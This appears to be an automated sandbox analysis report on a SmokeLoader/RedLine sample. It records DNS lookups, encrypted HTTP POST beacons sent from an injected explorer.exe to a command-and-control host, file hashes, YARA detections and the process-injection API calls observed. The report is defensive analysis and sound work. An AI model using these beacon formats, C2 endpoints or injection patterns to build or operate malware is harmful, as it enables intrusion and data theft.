Oct 18, 2024 15:25:25.066471100 CEST	1.1.1.1	192.168.2.7	0xad17	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:25.066498995 CEST	1.1.1.1	192.168.2.7	0xad17	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:25.066510916 CEST	1.1.1.1	192.168.2.7	0xad17	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:25.066520929 CEST	1.1.1.1	192.168.2.7	0xad17	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:25.117199898 CEST	1.1.1.1	192.168.2.7	0x5169	Name error (3)	livbev.online	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:29.178175926 CEST	1.1.1.1	192.168.2.7	0xa55b	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:29.178237915 CEST	1.1.1.1	192.168.2.7	0xa55b	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:29.178277016 CEST	1.1.1.1	192.168.2.7	0xa55b	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:29.178314924 CEST	1.1.1.1	192.168.2.7	0xa55b	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:48.049012899 CEST	1.1.1.1	192.168.2.7	0xa229	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:48.049037933 CEST	1.1.1.1	192.168.2.7	0xa229	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:48.049050093 CEST	1.1.1.1	192.168.2.7	0xa229	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:48.049060106 CEST	1.1.1.1	192.168.2.7	0xa229	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:48.065579891 CEST	1.1.1.1	192.168.2.7	0x7a3c	Name error (3)	livbev.online	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:52.172033072 CEST	1.1.1.1	192.168.2.7	0x1810	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:52.172060966 CEST	1.1.1.1	192.168.2.7	0x1810	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:52.172071934 CEST	1.1.1.1	192.168.2.7	0x1810	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:06.127989054 CEST	1.1.1.1	192.168.2.7	0x68cd	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:06.128014088 CEST	1.1.1.1	192.168.2.7	0x68cd	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:06.128026962 CEST	1.1.1.1	192.168.2.7	0x68cd	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:06.129482985 CEST	1.1.1.1	192.168.2.7	0x68cd	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:06.196914911 CEST	1.1.1.1	192.168.2.7	0x6051	Name error (3)	livbev.online	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:12.419866085 CEST	1.1.1.1	192.168.2.7	0xf9c4	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:12.419926882 CEST	1.1.1.1	192.168.2.7	0xf9c4	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:12.419939995 CEST	1.1.1.1	192.168.2.7	0xf9c4	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:12.419959068 CEST	1.1.1.1	192.168.2.7	0xf9c4	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

lmdcyyfuyaxd.net

tnc-corp.ru

qlmsuslstturema.net

fqucichlworiej.org

bucfhfnwdxdsnul.com

bkiiefwcdfdnawk.net

opseijdvwwpn.org

tggkhnieyacfcou.org

fcnnxutqeonf.org

kihrnkgidfarppr.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49804	58.151.148.90	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 15:22:28.584990025 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lmdcyyfuyaxd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 225 Host: tnc-corp.ru
Oct 18, 2024 15:22:28.585002899 CEST	225	OUT	Data Raw: 3b 6e 54 15 f1 b8 68 23 d6 a8 c1 00 00 01 72 b6 0e 7e be e7 6f 06 e4 60 79 0c 0e e6 30 cb c5 6c 92 58 c2 58 0f 6b 52 1a ed 9d 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 01 e7 86 Data Ascii: ;nTh#r~o`y0lXXkR?=8kI?pLM@NA .[k,vuI^p1w!D9,z-l>8B_Z>zU+?*55i_NhMQXMw{cXG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	54553	58.151.148.90	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 15:23:48.447185040 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qlmsuslstturema.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: tnc-corp.ru
Oct 18, 2024 15:23:48.449841022 CEST	137	OUT	Data Raw: 3b 6e 54 15 f1 b8 68 23 d6 a8 c1 00 00 01 72 b6 0e 7e be e7 6f 06 e4 60 79 0c 0e e6 30 cb c5 6c 92 58 c2 58 0f 6b 52 1a ed 9d 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 47 30 d4 e9 Data Ascii: ;nTh#r~o`y0lXXkR?=8kI?pLM@NA .[k,vuG0OTDdo8//>5dX?D@ZA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	54554	58.151.148.90	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 15:24:03.948381901 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fqucichlworiej.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 343 Host: tnc-corp.ru
Oct 18, 2024 15:24:03.948417902 CEST	343	OUT	Data Raw: 3b 6e 54 15 f1 b8 68 23 d6 a8 c1 00 00 01 72 b6 0e 7e be e7 6f 06 e4 60 79 0c 0e e6 30 cb c5 6c 92 58 c2 58 0f 6b 52 1a ed 9d 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 3c b7 9d Data Ascii: ;nTh#r~o`y0lXXkR?=8kI?pLM@NA .[k,vu#<IuxRxB,gUuhdRK1(>\Q?C<%*LKRqGC>/}%^Q;cXT<QX,Q);z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	54555	58.151.148.90	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 15:24:25.304286003 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bucfhfnwdxdsnul.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 322 Host: tnc-corp.ru
Oct 18, 2024 15:24:25.304306030 CEST	322	OUT	Data Raw: 3b 6e 54 15 f1 b8 68 23 d6 a8 c1 00 00 01 72 b6 0e 7e be e7 6f 06 e4 60 79 0c 0e e6 30 cb c5 6c 92 58 c2 58 0f 6b 52 1a ed 9d 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 04 b4 f5 Data Ascii: ;nTh#r~o`y0lXXkR?=8kI?pLM@NA .[k,vunS-_AYghZB`yT^]YMJta-2TLU%'vXP1URn6E&\|U/;2Pe`j.cN/;P-,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	54556	58.151.148.90	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 15:24:43.993356943 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bkiiefwcdfdnawk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 342 Host: tnc-corp.ru
Oct 18, 2024 15:24:43.993379116 CEST	342	OUT	Data Raw: 3b 6e 54 15 f1 b8 68 23 d6 a8 c1 00 00 01 72 b6 0e 7e be e7 6f 06 e4 60 79 0c 0e e6 30 cb c5 6c 92 58 c2 58 0f 6b 52 1a ed 9d 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 3a ec b8 Data Ascii: ;nTh#r~o`y0lXXkR?=8kI?pLM@NA .[k,vu':KMRqj*ybGI},6MpW`c:I,m'O;Cxq"DUW`OIo.9n`8P8d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	54558	197.164.156.210	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 15:25:00.061269999 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://opseijdvwwpn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 305 Host: tnc-corp.ru
Oct 18, 2024 15:25:00.061316967 CEST	305	OUT	Data Raw: 3b 6e 54 15 f1 b8 68 23 d6 a8 c1 00 00 01 72 b6 0e 7e be e7 6f 06 e4 60 79 0c 0e e6 30 cb c5 6c 92 58 c2 58 0f 6b 52 1a ed 9d 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 5d cb 8a Data Ascii: ;nTh#r~o`y0lXXkR?=8kI?pLM@NA .[k,vu&]_u`jP:6T-`j1?HKvV5!409NDxg Qqq!C'NCK#Fp&H@m,ytqBfv}(:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	54559	197.164.156.210	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 15:25:19.726708889 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tggkhnieyacfcou.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 272 Host: tnc-corp.ru
Oct 18, 2024 15:25:19.726744890 CEST	272	OUT	Data Raw: 3b 6e 54 15 f1 b8 68 23 d6 a8 c1 00 00 01 72 b6 0e 7e be e7 6f 06 e4 60 79 0c 0e e6 30 cb c5 6c 92 58 c2 58 0f 6b 52 1a ed 9d 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 4e f1 eb Data Ascii: ;nTh#r~o`y0lXXkR?=8kI?pLM@NA .[k,vu{N}A}zXs7]qh_^D/Zdq\1cJ$G7zmE9)?}Bw].8.=ZO}AA]EeFDC]-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	54560	197.164.156.210	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 15:25:35.276091099 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fcnnxutqeonf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 258 Host: tnc-corp.ru
Oct 18, 2024 15:25:35.276127100 CEST	258	OUT	Data Raw: 3b 6e 54 15 f1 b8 68 23 d6 a8 c1 00 00 01 72 b6 0e 7e be e7 6f 06 e4 60 79 0c 0e e6 30 cb c5 6c 92 58 c2 58 0f 6b 52 1a ed 9d 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 53 a8 fa Data Ascii: ;nTh#r~o`y0lXXkR?=8kI?pLM@NA .[k,vuASBwbb\olh^\|w`Dm#tvkY?.m!Pp\Z!/_R[U+fbzDM=&.VPR->U!iXh-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	54561	197.164.156.210	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 15:25:58.533226967 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kihrnkgidfarppr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 264 Host: tnc-corp.ru
Oct 18, 2024 15:25:58.533237934 CEST	264	OUT	Data Raw: 3b 6e 54 15 f1 b8 68 23 d6 a8 c1 00 00 01 72 b6 0e 7e be e7 6f 06 e4 60 79 0c 0e e6 30 cb c5 6c 92 58 c2 58 0f 6b 52 1a ed 9d 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 2d b9 b5 Data Ascii: ;nTh#r~o`y0lXXkR?=8kI?pLM@NA .[k,vuX-`ZtqZ1_~3tpa\:i9-<>5EW,Dw!!(~DGWEJngKPOVb)KKe"cIdQ0

Target ID:	6
Start time:	09:22:01
Start date:	18/10/2024
Path:	C:\Users\user\Desktop\PSyWSlhDa5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PSyWSlhDa5.exe"
Imagebase:	0x400000
File size:	431'616 bytes
MD5 hash:	DDEA2E8FDF71F225D8EDEBE0034E589F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1370701625.0000000000761000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1370701625.0000000000761000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1370528428.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1370528428.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.1370451305.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.1370487735.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:22:08
Start date:	18/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff70ffd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	11:12:41
Start date:	18/10/2024
Path:	C:\Users\user\AppData\Roaming\jhfrihr
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\jhfrihr
Imagebase:	0x400000
File size:	431'616 bytes
MD5 hash:	DDEA2E8FDF71F225D8EDEBE0034E589F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.1590943156.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.1591172725.0000000000681000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.1591172725.0000000000681000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.1590986972.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.1590986972.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.1591052783.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 41%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	37%
Total number of Nodes:	108
Total number of Limit Nodes:	2

Executed Functions

Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 203
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25

Function 0040158E Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24

Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20

Function 00403054 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040317C
NtTerminateProcess.NTDLL ref: 0040318D

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5

Function 00601BA4 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00601BCC
Module32First.KERNEL32(00000000,00000224), ref: 00601BEC

Memory Dump Source

Source File: 00000006.00000002.1370451305.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5f0000_PSyWSlhDa5.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 38ae7c9c91b78699183cd118174a961a9820ed62a21895c55ef5d01af0da0077
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 5EF0C2312403116BD7242AF99C8CAAB76E9AF4A721F100569E647D51C0EB70E9054660

Function 0062003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0062024D

Strings

kernel32.dll, xrefs: 0062008F, 00620095
cess, xrefs: 0062018D

Memory Dump Source

Source File: 00000006.00000002.1370487735.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_PSyWSlhDa5.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 42ec4702e70d4e90e99a8a4f860a1c510c2e99c0fd791167ea9c40f41969c617
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: FB526874A01229DFDB64CF58D985BA8BBB1BF09304F1480D9E94DAB352DB30AE85DF14

Function 00620E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00620223,?,?), ref: 00620E19
SetErrorMode.KERNELBASE(00000000,?,?,00620223,?,?), ref: 00620E1E

Memory Dump Source

Source File: 00000006.00000002.1370487735.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_PSyWSlhDa5.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ca7d39d3f00bb23aeb65542139c9111eb9232972a72a4ee517b453a7e7f206fa
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: FCD0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9581C770994046E5

Function 00401919 Relevance: 1.3, APIs: 1, Instructions: 79
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F

Function 00401959 Relevance: 1.3, APIs: 1, Instructions: 66
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
